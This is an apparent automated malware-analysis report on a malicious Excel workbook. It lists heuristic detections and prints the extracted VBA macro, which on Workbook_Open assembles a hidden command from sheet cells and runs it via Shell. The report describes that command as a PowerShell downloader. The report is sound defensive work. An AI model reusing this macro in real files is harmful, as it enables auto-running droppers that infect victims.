MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate the presence of a Shell call within a Workbook_Open macro. The extracted PowerShell command within the DOC BODY explicitly constructs a URL to download a PDF file and saves it as an executable in the temporary directory, which is then executed. This strongly suggests a downloader or dropper functionality.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
er = Shell(x, 0.2) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2163 bytes |
SHA-256: 9ca39a8597d46e72c3dec86270c2dcdf3b9ec4575956acd885e6ee0291791cfc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim uvrxnnnores As String
Private Sub Workbook_Open()
Call nmngtyy
End Sub
Private Sub nmngtyy()
LLLLL
End Sub
Public Sub LLLLL()
If 64.0987 + 56.63 = Log(608.8744) Then
Else
Call BPWySorE.pXXEbpyy
End If
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "BPWySorE"
Public Sub pXXEbpyy()
On Error Resume Next
Dim x As String
Dim cur(844300) As String
Dim iC As Integer
Worksheets("Sheet2").Activate
Range("R1").Activate
For iC = 0 To 7319
cur(iC) = ActiveCell.Offset(iC, 1).Value
Next iC
For iC = 0 To 7319
x = x & cur(iC)
Next iC
x = Replace(x, "fcopkjxcn", "")
If Sin(2) = Sin(1) Then
Dim k As String
Dim o As Variant
'MsgBox (x)
Else
Dim k1 As String
Dim o1 As Variant
End If
er = Shell(x, 0.2)
End Sub
Sub mnjdnkyx(igxdmic As String)
End Sub
Function myAMvXR(ByVal JbKryMeuMr As String, ByVal UIjXrHs As Integer)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.